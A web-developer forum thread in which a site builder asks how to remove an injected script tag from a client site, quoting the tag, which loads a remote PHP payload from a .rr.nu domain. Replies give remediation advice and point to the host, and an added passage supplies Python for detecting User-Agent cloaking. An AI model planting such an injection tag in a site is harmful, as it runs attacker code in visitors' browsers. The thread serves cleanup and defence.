Hacked/Infected files

Hello,

One of the sites I built (www.superiorsteelroofing.com) seems to have been infected with some kind of injection script. I have checked through the theme and core files and can't seem to find where on earth the script is attached.

Any ideas where I would look to find and remove this?

Here is the code that's right at the bottom before the closing body tag:

<script src="http://thurse88eksfact.rr.nu/nl.php?p=d"></script>


Thanks for your help with this!

iTrendesign
 
Mnkras replied:
Scan your computer and anyone else's computer that uses FTP to connect to the website; that is usually the cause. Change all your webhost passwords, and ask your host if they can scan for that, because it could be anywhere if your FTP was compromised.

Mike
xaritas replied (Best Answer):
Definitely a problem with your host, Dreamhost, assuming that you secured everything after the major breach they had back in January-ish. See this exchange:
http://webmasters.stackexchange.com/questions/26475/is-someone-hija...

It is possible for the web server itself to insert HTML, so it may not have anything to do with your site (you can check this though by copying your site to a host you can secure, or comparing checksums with a known good installation).

Interestingly, this malware is sniffing based on the User Agent. It only appears when using known browser agents. I assume to get around search engine crawlers finding it.

In any case, you should file a ticket with Dreamhost.
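
The User-Agent behaviour described in the answer above can be checked by comparing the off-site script hosts in the HTML served to a crawler User-Agent with those served to a browser User-Agent. This is an added example, not part of the original thread; the function names, the `fetch` helper, and the sample HTML and host names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import Request, urlopen

class _ScriptHosts(HTMLParser):
    """Collect the host of every <script src=...> that points off-site."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src") or ""
        host = (urlparse(src).hostname or "").lower()  # relative URLs have no host
        if host and host != self.site_host:
            self.hosts.add(host)

def external_script_hosts(html, site_host):
    parser = _ScriptHosts(site_host)
    parser.feed(html)
    return parser.hosts

def cloaked_hosts(pages, site_host, baseline="crawler"):
    """pages maps a label to the HTML served for that User-Agent.
    Returns {label: hosts served to that label but not to the baseline}."""
    base = external_script_hosts(pages[baseline], site_host)
    diff = {label: external_script_hosts(html, site_host) - base
            for label, html in pages.items() if label != baseline}
    return {label: hosts for label, hosts in diff.items() if hosts}

def fetch(url, user_agent):
    """Fetch url with a chosen User-Agent header to build the pages dict."""
    req = Request(url, headers={"User-Agent": user_agent})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")

# Constructed sample responses for the same page on www.example.com
SAMPLE = {
    "crawler": '<html><body><script src="/js/site.js"></script>'
               '<script src="http://cdn.example.net/jquery.js"></script></body></html>',
    "browser": '<html><body><script src="/js/site.js"></script>'
               '<script src="http://cdn.example.net/jquery.js"></script>'
               '<script src="http://injected.example.org/x.php"></script></body></html>',
}
```

A host that shows up only under the browser label is the one to report to the hosting provider, since legitimate third-party scripts are normally served to every client.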
iTrendesign replied:
Thank you both for your help and advice. I will be having my client contact their host right away!
fastcrash replied:
All your sites are really cool, I like them all.
iTrendesign replied:
Thank you very much. Your kind words are very much appreciated. We are a little behind updating some more recent sites we've worked on but hope to get them up to share very soon!
xaritas replied:
If you find out what the source was, please post back here. I use Dreamhost for some things so I'm curious what they do about it.